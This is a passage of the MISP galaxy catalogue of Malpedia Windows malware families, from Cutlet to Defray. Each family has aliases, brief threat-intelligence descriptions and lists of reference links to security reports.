The tag is: misp-galaxy:malpedia="Cutlet"

Cutlet is also known as:

Table 1663. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet
http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html
https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf
https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html

Cutwail

The tag is: misp-galaxy:malpedia="Cutwail"

Cutwail is also known as:

Table 1664. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail
http://www.secureworks.com/research/threat-profiles/gold-essex
https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf
https://securityintelligence.com/dridex-campaign-propelled-by-cutwail-botnet-and-powershell/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.mimecast.com/blog/how-to-slam-a-door-on-the-cutwail-botnet-enforce-dmarc/
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
https://www.secureworks.com/research/threat-profiles/gold-essex
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf
https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

CyberGate

The tag is: misp-galaxy:malpedia="CyberGate"

CyberGate is also known as:

Rebhip

Table 1665. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://blog.reversinglabs.com/blog/rats-in-the-library
https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://citizenlab.ca/2015/12/packrat-report/
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

CyberSplitter

The tag is: misp-galaxy:malpedia="CyberSplitter"

CyberSplitter is also known as:

Table 1666. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter

CycBot

The tag is: misp-galaxy:malpedia="CycBot"

CycBot is also known as:

Table 1667. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot
https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/

Cyrat

Ransomware.

The tag is: misp-galaxy:malpedia="Cyrat"

Cyrat is also known as:

Table 1668. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cyrat
https://www.gdatasoftware.com/blog/cyrat-ransomware
https://id-ransomware.blogspot.com/2020/08/cyrat-ransomware.html

cysxl

The tag is: misp-galaxy:malpedia="cysxl"

cysxl is also known as:

Table 1669. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.cysxl
https://www.enigmasoftware.com/bkdrcysxla-removal/

Dacls (Windows)

The tag is: misp-galaxy:malpedia="Dacls (Windows)"

Dacls (Windows) is also known as:

MATA

Table 1670. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dacls
https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/
https://blog.netlab.360.com/dacls-the-dual-platform-rat/
https://www.sygnia.co/mata-framework
https://securelist.com/apt-trends-report-q2-2020/97937/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://malwareandstuff.com/peb-where-magic-is-stored/
https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

DADJOKE

DADJOKE was discovered as being distributed via email, targeting a South-East Asian Ministry of Defense. It is delivered as an embedded EXE file in a Word document using remote templates and a unique macro using multiple GET requests. The payload is deployed using load-order hijacking with a benign Windows Defender executable. Stage 1 has only beacon+download functionality, made to look like a PNG file. Additional analysis by Kaspersky found 8 campaigns over 2019 and no activity prior to January 2019, DADJOKE is attributed with medium confidence to APT40.

The tag is: misp-galaxy:malpedia="DADJOKE"

DADJOKE is also known as:

Table 1671. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dadjoke
https://medium.com/@Sebdraven/apt-40-in-malaysia-61ed9c9642e9
https://twitter.com/a_tweeter_user/status/1154764787823316993
https://twitter.com/ClearskySec/status/1110941178231484417
https://www.youtube.com/watch?v=vx9IB88wXSE
https://prezi.com/view/jGyAzyy5dTOkDrtwsJi5/
https://wemp.app/posts/80ab2b2d-4e0e-4960-94b7-4d452a06fd38?utm_source=latest-posts

DADSTACHE

The tag is: misp-galaxy:malpedia="DADSTACHE"

DADSTACHE is also known as:

Table 1672. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache
https://medium.com/insomniacs/dad-theres-a-rat-in-here-e3729b65bf7a
https://medium.com/insomniacs/apt40-goes-from-template-injections-to-ole-linkings-for-payload-delivery-99eb43170a97
https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign
https://danielplohmann.github.io/blog/2020/07/10/kf-sandbox-necromancy.html
https://twitter.com/killamjr/status/1204584085395517440
https://twitter.com/cyb3rops/status/1199978327697694720

Dairy

The tag is: misp-galaxy:malpedia="Dairy"

Dairy is also known as:

Table 1673. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

DanaBot

Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.

The tag is: misp-galaxy:malpedia="DanaBot"

DanaBot is also known as:

Table 1674. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot
https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf
https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/
https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/
https://www.proofpoint.com/us/blog/threat-insight/new-year-new-version-danabot
https://www.gdatasoftware.com/blog/2019/05/31695-strange-bits-smuggling-malware-github
https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html
https://securelist.com/financial-cyberthreats-in-2020/101638/
https://asert.arbornetworks.com/danabots-travels-a-global-perspective/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://malwareandstuff.com/deobfuscating-danabots-api-hashing/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://research.checkpoint.com/danabot-demands-a-ransom-payment/
https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/
https://blog.lexfo.fr/danabot-malware.html
https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf
https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/
https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/

danbot

The tag is: misp-galaxy:malpedia="danbot"

danbot is also known as:

Table 1675. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot
https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf
https://www.secureworks.com/research/threat-profiles/cobalt-lyceum
https://www.clearskysec.com/wp-content/uploads/2021/08/Siamesekitten.pdf
https://otx.alienvault.com/pulse/5d4301edb3f3406ac01acc0f
https://www.youtube.com/watch?v=FttiysUZmDw
https://cyberx-labs.com/blog/deep-dive-into-the-lyceum-danbot-malware/

DarkComet

DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After being used in the Syrian civil war in 2011, Lesuer decided to stop developing the trojan. Indeed, DarkComet is able to enable control over a compromised system through use of a simple graphic user interface. Experts think that this user friendliness is the key of its mass success.

The tag is: misp-galaxy:malpedia="DarkComet"

DarkComet is also known as:

Breut
Fynloski
klovbot

Table 1676. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage
https://content.fireeye.com/apt/rpt-apt38
https://www.secureworks.com/research/threat-profiles/aluminum-saratoga
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html
https://www.secureworks.com/research/threat-profiles/copper-fieldstone
https://www.sysnet.ucsd.edu/sysnet/miscpapers/darkmatter-www20.pdf
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html
https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/
https://www.tgsoft.it/files/report/download.asp?id=7481257469
https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.DarkComet
https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/

DarkIRC

The tag is: misp-galaxy:malpedia="DarkIRC"

DarkIRC is also known as:

Table 1677. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.darkirc
https://blogs.juniper.net/en-us/threat-research/darkirc-bot-exploits-oracle-weblogic-vulnerability

DarkMegi

The tag is: misp-galaxy:malpedia="DarkMegi"

DarkMegi is also known as:

Table 1678. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi
http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html
http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html

Darkmoon

The tag is: misp-galaxy:malpedia="Darkmoon"

Darkmoon is also known as:

Chymine

Table 1679. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon
http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html
https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml
http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html

DarkPulsar

The tag is: misp-galaxy:malpedia="DarkPulsar"

DarkPulsar is also known as:

Table 1680. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar
https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/

DarkRat

The tag is: misp-galaxy:malpedia="DarkRat"

DarkRat is also known as:

Table 1681. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.darkrat
https://github.com/albertzsigovits/malware-writeups/blob/master/DarkRATv2/README.md

DarkShell

DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.

The tag is: misp-galaxy:malpedia="DarkShell"

DarkShell is also known as:

Table 1682. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkshell-ddos-botnet-evolves-with-variants/

DarkSide (Windows)

FireEye describes DARKSIDE as a ransomware written in C and configurable to target files whether on fixed, removable disks, or network shares. The malware can be customized by the affiliates to create a build for specific victims.

The tag is: misp-galaxy:malpedia="DarkSide (Windows)"

DarkSide (Windows) is also known as:

BlackMatter

Table 1683. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.darkside
https://www.bloomberg.com/news/articles/2021-05-13/colonial-pipeline-paid-hackers-nearly-5-million-in-ransom
https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service
https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound
http://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/
https://www.intel471.com/blog/darkside-ransomware-colonial-pipeline-attack
https://news.sophos.com/en-us/2021/05/11/a-defenders-view-inside-a-darkside-ransomware-attack/
https://www.advanced-intel.com/post/from-dawn-to-silent-night-darkside-ransomware-initial-attack-vector-evolution
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://github.com/sisoma2/malware_analysis/tree/master/blackmatter
https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime
https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/
https://twitter.com/ValthekOn/status/1422385890467491841?s=20
https://ghoulsec.medium.com/mal-series-13-darkside-ransomware-c13d893c36a6
https://therecord.media/popular-hacking-forum-bans-ransomware-ads/
https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/
https://www.nozominetworks.com/blog/colonial-pipeline-ransomware-attack-revealing-how-darkside-works/
https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b
https://www.reuters.com/technology/colonial-pipeline-halts-all-pipeline-operations-after-cybersecurity-attack-2021-05-08/
https://blog.cyble.com/2021/08/05/blackmatter-under-the-lens-an-emerging-ransomware-group-looking-for-affiliates/
https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/
https://chuongdong.com/reverse%20engineering/2021/05/06/DarksideRansomware/
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout
https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted
https://www.bleepingcomputer.com/news/security/darkside-ransomware-is-creating-a-secure-data-leak-service-in-iran/
https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware
https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf
https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections
https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html
https://www.varonis.com/blog/darkside-ransomware/
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://www.databreaches.net/a-chat-with-darkside/
https://www.youtube.com/watch?v=qxPXxWMI2i4
https://www.deepinstinct.com/2021/06/04/the-ransomware-conundrum-a-look-into-darkside/
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a
https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions
https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/
https://id-ransomware.blogspot.com/2020/08/darkside-ransomware.html
https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/
https://unit42.paloaltonetworks.com/darkside-ransomware/
https://therecord.media/ransomware-gang-wants-to-short-the-stock-price-of-their-victims/
http://ti.dbappsecurity.com.cn/blog/index.php/2021/05/10/darkside/
https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/
https://zetter.substack.com/p/anatomy-of-one-of-the-first-darkside
https://www.splunk.com/en_us/blog/security/the-darkside-of-the-ransomware-pipeline.html
https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/
https://cybergeeks.tech/a-step-by-step-analysis-of-a-new-version-of-darkside-ransomware/
https://www.bleepingcomputer.com/news/security/darkside-affiliates-claim-gangs-bitcoins-in-deposit-on-hacker-forum/
https://twitter.com/JAMESWT_MHT/status/1388301138437578757
https://www.databreachtoday.com/blogs/darkside-ransomware-gang-launches-affiliate-program-p-2968
https://blog.group-ib.com/blackmatter#
https://github.com/Haxrein/Malware-Analysis-Reports/blob/main/darkside_ransomware_technical_analysis_report.pdf
https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636
https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2021/05/18/darkside_ransomware-QfsV.html
https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin
https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims
https://threatpost.com/guess-fashion-data-loss-ransomware/167754/
https://www.repubblica.it/economia/finanza/2021/04/28/news/un_sospetto_attacco_telematico_blocca_le_filiali_della_bcc_di_roma-298485827/
https://www.dragos.com/blog/industry-news/recommendations-following-the-colonial-pipeline-cyber-attack/
https://us-cert.cisa.gov/ncas/alerts/aa21-131a
https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/
https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/
https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/
https://id-ransomware.blogspot.com/2021/07/blackmatter-ransomware.html
https://www.secureworks.com/research/threat-profiles/gold-waterfall
https://www.sentinelone.com/blog/meet-darkside-and-their-ransomware-sentinelone-customers-protected/
https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/
https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/
https://www.bleepingcomputer.com/news/security/us-chemical-distributor-shares-info-on-darkside-ransomware-data-theft/
https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/
https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html
https://twitter.com/sysopfb/status/1422280887274639375
https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion
https://www.bleepingcomputer.com/news/security/darkside-ransomware-gang-returns-as-new-blackmatter-operation/
https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/
https://securityintelligence.com/posts/darkside-oil-pipeline-ransomware-attack/
https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/
https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/
https://krebsonsecurity.com/2021/05/a-closer-look-at-the-darkside-ransomware-gang/
https://www.acronis.com/en-us/articles/darkside-ransomware/
https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/
https://www.secjuice.com/blue-team-detection-darkside-ransomware/
https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html
https://community.riskiq.com/article/fdf74f23
https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/
https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/
https://blog.360totalsecurity.com/en/darksides-targeted-ransomware-analysis-report-for-critical-u-s-infrastructure-2/
https://socprime.com/blog/affiliates-vs-hunters-fighting-the-darkside/
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf
https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/
https://www.trendmicro.com/en_us/research/21/e/what-we-know-about-darkside-ransomware-and-the-us-pipeline-attac.html

Darksky

DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.

The tag is: misp-galaxy:malpedia="Darksky"

Darksky is also known as:

Table 1684. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky
http://telegra.ph/Analiz-botneta-DarkSky-12-30
https://blog.radware.com/security/2018/02/darksky-botnet/

DarkStRat

The tag is: misp-galaxy:malpedia="DarkStRat"

DarkStRat is also known as:

Table 1685. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat
https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/

DarkTequila

Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.

The tag is: misp-galaxy:malpedia="DarkTequila"

DarkTequila is also known as:

Table 1686. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila
https://securelist.com/dark-tequila-anejo/87528/

Darktrack RAT

DtBackdoor

The tag is: misp-galaxy:malpedia="Darktrack RAT"

Darktrack RAT is also known as:

Table 1687. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat
https://www.facebook.com/darktrackrat/
https://cracked.to/Thread-Release-RAT-Dark-track-alien-4-1
http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml
https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html
https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf
https://www.tgsoft.it/files/report/download.asp?id=7481257469

Daserf

The tag is: misp-galaxy:malpedia="Daserf"

Daserf is also known as:

Muirim
Nioupale

Table 1688. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf
http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/
https://www.secureworks.com/research/threat-profiles/bronze-butler
https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/

DataExfiltrator

The tag is: misp-galaxy:malpedia="DataExfiltrator"

DataExfiltrator is also known as:

FileSender

Table 1689. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.data_exfiltrator
https://blog.reversinglabs.com/blog/data-exfiltrator

Datper

The tag is: misp-galaxy:malpedia="Datper"

Datper is also known as:

Table 1690. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.datper
https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf
https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses
https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/
https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf
https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
https://www.macnica.net/mpressioncss/feature_05.html/
http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html
http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/
https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf

DBatLoader

This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.

The tag is: misp-galaxy:malpedia="DBatLoader"

DBatLoader is also known as:

ModiLoader
NatsoLoader

Table 1691. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html
https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands
https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/

DCRat

DCRat is a typical RAT that has been around since at least June 2019.

The tag is: misp-galaxy:malpedia="DCRat"

DCRat is also known as:

DarkCrystal RAT

Table 1692. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
https://tccontre.blogspot.com/2019/10/dcrat-malware-evades-sandbox-that-use.html
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html
https://www.youtube.com/watch?v=ElqmQDySy48

DDKeylogger

The tag is: misp-galaxy:malpedia="DDKeylogger"

DDKeylogger is also known as:

Table 1693. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkeylogger
https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

DDKONG

The tag is: misp-galaxy:malpedia="DDKONG"

DDKONG is also known as:

Table 1694. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong
https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/
https://www.secureworks.com/research/threat-profiles/bronze-overbrook
https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

DealPly

The tag is: misp-galaxy:malpedia="DealPly"

DealPly is also known as:

Table 1695. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dealply
https://kienmanowar.wordpress.com/2021/05/11/quick-analysis-note-about-dealply-adware/

dearcry

The tag is: misp-galaxy:malpedia="dearcry"

dearcry is also known as:

DoejoCrypt

Table 1696. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dearcry
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b
https://www.youtube.com/watch?v=qmCjtigVVR0
https://lifars.com/wp-content/uploads/2021/04/DearCry_Ransomware.pdf
https://www.youtube.com/watch?v=Hhx9Q2i7zGo
https://www.youtube.com/watch?v=MRTdGUy1lfw
https://www.youtube.com/watch?v=6lSfxsrs61s&t=5s
https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities
https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/

DeathRansom

Also known as Wacatac ransomware due to its .wctc extension.

The tag is: misp-galaxy:malpedia="DeathRansom"

DeathRansom is also known as:

deathransom
wacatac

Table 1697. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom
https://www.fortinet.com/blog/threat-research/death-ransom-attribution.html
https://asec.ahnlab.com/1269
https://dissectingmalwa.re/quick-and-painless-reversing-deathransom-wacatac.html
https://www.fortinet.com/blog/threat-research/death-ransom-new-strain-ransomware.html
https://id-ransomware.blogspot.com/2019/11/wacatac-ransomware.html
https://twitter.com/Amigo_A_/status/1196898012645220354
https://github.com/albertzsigovits/malware-notes/blob/master/DeathRansom.md

Decebal

The tag is: misp-galaxy:malpedia="Decebal"

Decebal is also known as:

Table 1698. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal
https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf
https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html

DeepRAT

The tag is: misp-galaxy:malpedia="DeepRAT"

DeepRAT is also known as:

Table 1699. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.deep_rat
https://twitter.com/benkow_/status/1415797114794397701

Defray

Defray is ransomware that appeared in 2017, and is targeted ransomware, mainly on the healthcare vertical.

The distribution of Defray has several notable characteristics: According to Proofpoint: " Defray is currently being spread via Microsoft Word document attachments in email The campaigns are as small as several messages each The lures are custom crafted to appeal to the intended set of potential victims The recipients are individuals or distribution lists, e.g., group@ and websupport@ Geographic targeting is in the UK and US Vertical targeting varies by campaign and is narrow and selective "

The tag is: misp-galaxy:malpedia="Defray"

Defray is also known as:

Glushkov

Table 1700. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.defray
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3
https://threatvector.cylance.com/en_us/home/threat-spotlight-defray-ransomware-hits-healthcare-and-education.html
https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/
https://www.youtube.com/watch?v=LUxOcpIRxmg
